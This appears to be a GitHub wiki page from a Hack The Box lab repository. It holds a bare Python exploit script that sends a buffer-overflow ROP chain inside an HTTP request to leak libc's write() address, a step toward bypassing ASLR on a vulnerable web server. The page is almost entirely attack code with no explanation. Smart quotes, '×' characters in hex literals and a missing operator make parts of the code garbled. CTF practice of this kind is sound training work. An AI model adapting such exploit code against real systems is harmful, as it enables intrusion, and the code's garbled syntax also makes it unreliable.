leak_write - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
import os, sys, socket
import struct
from pwn import *
import urllib

addr = (‘127.0.0.1’, 9999)
#addr = (‘10.10.10.89’, 1111)
libcread_offset = 0xe8050
libcsystem_offset = 0×42510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

payload = ‘’
payload += ’A’ * (568 -5) #total offset 568 – see socket.send [s.send(r’GET /\AAAA’……..

#leak address of write() in randomised libc
payload += p64(0×4011dd) #pop rdi; ret
payload += p64(0×4) #stdout # fd arg
payload += p64(0×4011db) #pop rsi; pop r15; ret
payload += p64(0×603088) #write() in GOT
payload += p64(0xFF) #junk for r15
payload += p64(0×400c50) #write() call loc

s.connect(addr)
s.send(r’GET /\AAAA’+urllib.quote_plus(payload)’ ’r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /‘+’\n’+’\n’+’\n’)

print s.recv(1024)

s.close